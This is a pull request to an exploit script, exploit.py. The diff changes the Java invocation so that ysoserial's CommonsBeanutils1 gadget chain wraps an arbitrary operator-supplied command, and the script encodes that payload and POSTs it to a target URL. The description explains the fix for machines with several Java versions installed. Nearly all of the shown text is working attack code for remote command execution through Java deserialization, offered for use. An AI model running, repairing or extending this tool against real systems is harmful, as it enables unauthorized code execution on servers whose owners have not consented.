### PR TITLE
Fix: 'Error: Unable to access jarfile java.base/java.net=ALL-UNNAMED'

### DIFF
--- a/exploit.py
+++ b/exploit.py
@@ -109,7 +109,7 @@ def main():
     if args.cmd is None:
         scan(url)
     else:
-        command = f"java -jar --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED ysoserial-all.jar CommonsBeanutils1 '{args.cmd}'"
+        command = f"{os.environ['JAVA_HOME']}/bin/java -jar --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED ysoserial-all.jar CommonsBeanutils1 '{args.cmd}'"
         encoded_output = get_encoded_payload(command)
         send_post_request(url, encoded_output)
 


### PR DESCRIPTION
Fix: 'Error: Unable to access jarfile java.base/java.net=ALL-UNNAMED' when multiple Java versions are on the system and currently $JAVA_HOME env variable is the wrong one. So there is no need to permanently switch the Java Versions, it it enough to export in the terminal needed java version.